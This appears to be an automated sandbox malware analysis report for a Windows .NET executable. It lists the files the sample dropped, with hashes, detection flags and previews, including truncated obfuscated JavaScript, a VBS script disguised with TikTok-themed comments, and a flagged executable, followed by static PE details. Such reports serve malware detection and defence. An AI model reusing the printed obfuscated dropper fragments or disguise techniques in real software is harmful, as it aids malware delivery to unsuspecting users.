                                                                  Preview:<html><head><meta http-equiv='x-ua-compatible' content='EmulateIE9'><META NAME='GENERATOR' Content='The source code of this page is encrypted with HTML Guardian, the world's standart for website protection. Visit http://www.protware.com for details'><meta http-equiv='expires' content=''><script>l1l=document.documentMode||document.all;var c6efa=true;ll1=document.layers;lll=window.sidebar;c6efa=(!(l1l&&ll1)&&!(!l1l&&!ll1&&!lll));l_ll=location+'';l11=navigator.userAgent.toLowerCase();function lI1(l1I){return l11.indexOf(l1I)>0?true:false};lII=lI1('kht')|lI1('per');c6efa|=lII;zLP=location.protocol+'0FD';pHcl5jBGPFb='kmOsd6OpxRj6';</script><script>la0Q6t4=new Array();la0Q6t4[0]='\151\130%34\150\101p%38%35%41S%55O';o4Jfj0q=new Array();o4Jfj0q[0]='.<.!.D.O.C.T.Y.P.E. .h.t.m.l. .P.U.B.L.I.C. .".-././.W.3.C~..D.T.D. .X.H.T.M.L. .1...0. .T.r.a.n.s.i.t.i.o.n.a.l~..E.N."~.~\n.t.p.:~..w~B...w.3...o.r.g./.T.R./.x~\n~..1./~..D~N~P.l.1.-.t~-~/~1~3~5.l...d.t.d.".>.\r.\n.<~W. .x~.~/.=."~=~?~A~C~E~G~I./

                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):11608
                                                                  Entropy (8bit):4.890472898059848
                                                                  Encrypted:false
                                                                  SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9R:9rib4ZmVoGIpN6KQkj2Fkjh4iUxsT6YP
                                                                  MD5:8A4B02D8A977CB929C05D4BC2942C5A9
                                                                  SHA1:F9A6426CAF2E8C64202E86B07F1A461056626BEA
                                                                  SHA-256:624047EB773F90D76C34B708F48EA8F82CB0EC0FCF493CA2FA704FCDA7C4B715
                                                                  SHA-512:38697525814CDED7B27D43A7B37198518E295F992ECB255394364EC02706443FB3298CBBAA57629CCF8DDBD26FD7CAAC44524C4411829147C339DD3901281AC2
                                                                  Malicious:false
                                                                  Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:data
                                                                  Category:modified
                                                                  Size (bytes):64
                                                                  Entropy (8bit):0.34726597513537405
                                                                  Encrypted:false
                                                                  SSDEEP:3:Nlll:Nll
                                                                  MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                  SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                  SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                  SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                  Malicious:false
                                                                  Preview:@...e...........................................................

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2fpoqur3.zdh.psm1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4aths2ad.4bp.ps1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5wrtjuho.m21.ps1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bq2zehub.nxm.psm1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cx3c11fl.imw.psm1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h3kioott.wnd.ps1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ldbas25b.cop.ps1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m2ac3ub3.arh.ps1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qigqy2qy.2fs.psm1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rincivhc.ete.ps1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rvsy0o3t.usa.ps1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sasr3sd4.zg1.psm1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sydrbra3.2pd.psm1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ykqwjlwn.cow.psm1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\tempScript.js

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                  File Type:ASCII text, with very long lines (2939), with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):2939
                                                                  Entropy (8bit):5.758262525296362
                                                                  Encrypted:false
                                                                  SSDEEP:48:yUUBn+XybkxTXOaV999stxe5fNY3hSGkRBKYNHPGSzEbCFCX7C8E3vNp:ZUB7oxTBj98xebY0GKHOSz9lxv7
                                                                  MD5:82F229D0C36B68073DA70EF5958E425D
                                                                  SHA1:2BEB8CD227B49B1D119165D6E3D258DDB730387A
                                                                  SHA-256:0F2579FDB9CBAAEC15015DF17DBAAFD73A9D7D3202321ABA6A1C8479CAC17394
                                                                  SHA-512:4553F11B61E2C1CB1EBF532E7417380A8A5C19121331B76894BF5D3605A905FA3F62B54D596A818709F28C49FD7EB1D880798907A84CAC45CCFF65EE93F9E970
                                                                  Malicious:true
                                                                  Preview:(function(){var tWr='',npj=760-749;function Msw(k){var a=834683;var d=k.length;var u=[];for(var i=0;i<d;i++){u[i]=k.charAt(i)};for(var i=0;i<d;i++){var z=a*(i+449)+(a%24515);var s=a*(i+729)+(a%12699);var f=z%d;var t=s%d;var y=u[f];u[f]=u[t];u[t]=y;a=(z+s)%3553729;};return u.join('')};var tey=Msw('numkfxtthdwaccosvejurglbotzoicpsnrrqy').substr(0,npj);var cRN='Am" to- pxv)ul=(6h8v.rl(rrgii]yhgar f7yrn+=r((=((u=rion)yy.-ni1,f.Cw7rh56).gd;t8e0(cr9p,== n=hi6y+(7-0=9=.87v8,.d9rro,,vlak)u)uhvi7,rkg9svny(r.t+c(l=n,t2Cr[=z=lrjy;t,iu)r.+7]68e lcn+.[[yte]n;bzv6he,eCueuj)+ 0;lrSagn8er;8t7encbm;;utotwj=9==n+)0;+tns(lsss smv-= h5v firtaidm ;..c1tt4y1 hl1q{fffu0vh]n+,(ivleaaig}r,ror(vir;;[1";(;h=.2; b;v;fa;)i.le-6tluse[e1;fc,]hasw;f{)d<a]; h)3caru.=tae)xru=pers;v= =xhhC=spt,;hc.g0n2j(h=+[;" ;l}ho}5l0[Atvaor.et;tyh]r2+ep;<s;;o,6ch=hg{{<xdmalarn=",+)+ez-ap=forepv(+=3s(),i=hartot=Aj2;r2.or*cntx01,}. a(+hbAi(;0n,ocp; rn)4nadu)l)[u1]g"=pb,{{paikfde3qrstd;(kqg,2gc{c.;tv= +rvagzno9=r()l} flw[=s(lar af=(rrw,

                                                                  C:\Users\user\AppData\Roaming\CMD.vbs

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with very long lines (361), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):28112
                                                                  Entropy (8bit):4.483630680408216
                                                                  Encrypted:false
                                                                  SSDEEP:192:eC8m1myC8m1myC8mYmyC8m3JmyC8mYmyC8m3JmyC8mgdmyC8m1myC8m1myC8m1mu:eIInGnGdIIInGnGB
                                                                  MD5:238EC4D17050E1841E8E0171407C2260
                                                                  SHA1:2C8C14B257641F1E1151C6303DABDE01621314F2
                                                                  SHA-256:163C4066DA47B2E8B7D3690A374C79856417DE2E09C74C0E7C807CD0B5C4B8FB
                                                                  SHA-512:3EAA1EBCA8B9AD021342846040FAF19C5EF420C319A9A649B31FFB9107B54D71F60F6E4372E0256F123B931F5C3DD11A34AD9C4CCB7D0A3C687A90BA50CD2102
                                                                  Malicious:true
                                                                  Preview:..' I reupload videos that have had several million views, but I have them gaining less than a thousand, what am I doing wrong? Why is this happening?..'Imagine if each reuploaded video gained the same number of views as the original and was uploaded until users simply get bored. In such a case TikTok would be overflowing with duplicates and traffers would be swimming in views. By the way, a couple years ago it was like that...'TikTok, as well as other platforms, is actively fighting plagiarism, improving its algorithms and training AI to prevent content re-posting, both from other platforms and within TikTok itself...'First of all, when a video is uploaded to TikTok, it is instantly processed by (AI) that identifies objects in the video, categorizes it and looks for violations. The video is then compressed, parameters and metadata are changed. If you download and upload that video again, TT immediately recognizes it and your chances of getting recommended go down to zero...'However

                                                                  C:\Users\user\AppData\Roaming\LB31.exe

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):7679488
                                                                  Entropy (8bit):7.744308216067832
                                                                  Encrypted:false
                                                                  SSDEEP:196608:/UUPSHwaRhOgwVPj04wfOAlM69LJDuHF:dKHwgt+Pov7y
                                                                  MD5:C9E6AA21979D5FC710F1F2E8226D9DFE
                                                                  SHA1:D881F97A1FE03F43BED2A9609EAE65531CF710CF
                                                                  SHA-256:A1A8CFCC74F8F96FD09115189DEFE07AC6FC2E85A9FF3B3EC9C6F454AEDE1C1D
                                                                  SHA-512:9E90BCB64B0E1F03E05990CDEAD076B4C6E0B050932ECB953DAE50B7E92B823A80FC66D1FD8753591719E89B405757B2BF7518814BC6A19BB745124D1A691627
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 63%
                                                                  Joe Sandbox View:
                                                                  • Filename: YSU1PShcKh.exe, Detection: malicious, Browse
                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                  Preview:MZx.....................@...................................x...hr......!..L.!This program cannot be run in DOS mode.$..PE..d...^n.e.........."..........xT...............@.....................................u...`...................................................U.......S.f... ..............."..............................`"..(................................................... . ..S.......R.................@....rsrc...f.....S.......R.............@....idata ......U.......S.............@... ..8...U.......S.............@...ndryujmp.p!..`...f!...S.............@...tnyudguu............*u.............@....pdata.I............,u.............@..@................................................................................................................................................................................................................................................................................................................................................

                                                                  C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                  Download File
                                                                  Process:C:\Windows\System32\svchost.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):55
                                                                  Entropy (8bit):4.306461250274409
                                                                  Encrypted:false
                                                                  SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                  MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                  SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                  SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                  SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                  Malicious:false
                                                                  Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                  Static File Info

                                                                  General

                                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Entropy (8bit):5.880220641771827
                                                                  TrID:
                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                  • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                  • DOS Executable Generic (2002/1) 0.01%
                                                                  File name:file.exe
                                                                  File size:51'200 bytes
                                                                  MD5:16b50170fda201194a611ca41219be7d
                                                                  SHA1:2ddda36084918cf436271451b49519a2843f403f
                                                                  SHA256:a542a2170abf4de0cd79baeb2e8f08deaf6fdeea40e9fc1ec15cbeb988e7900a
                                                                  SHA512:f07ed33310acc5008cda9dbf3c50e420ad3f76ed11b28b93b2bb32d47ddbb64c97b906babaf6edf2680bea5b6f7456c7986a8610cee30b867d3a07c4430f79e0
                                                                  SSDEEP:768:l5Fe4QnnpnQLtNvxrb0kk/6HpU6pqZ4sSbBLol:lDejnnpnQLPxAkk/OpA4TbBL6
                                                                  TLSH:C333C99C765072DFC86BC876DAA82C64EA60747B570F8303A05316EDAE0D99BCF151F2
                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0.............^.... ........@.. ....................... ............@................................

                                                                  File Icon

                                                                  Icon Hash:00928e8e8686b000

                                                                  Static PE Info

                                                                  General

                                                                  Entrypoint:0x40dc5e
                                                                  Entrypoint Section:.text
                                                                  Digitally signed:false
                                                                  Imagebase:0x400000
                                                                  Subsystem:windows gui
                                                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                  Time Stamp:0xAA2EC588 [Wed Jun 23 04:52:24 2060 UTC]
                                                                  TLS Callbacks:
                                                                  CLR (.Net) Version:
                                                                  OS Version Major:4
                                                                  OS Version Minor:0
                                                                  File Version Major:4
                                                                  File Version Minor:0
                                                                  Subsystem Version Major:4
                                                                  Subsystem Version Minor:0
                                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                  Entrypoint Preview

                                                                  Instruction
                                                                  jmp dword ptr [00402000h]
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
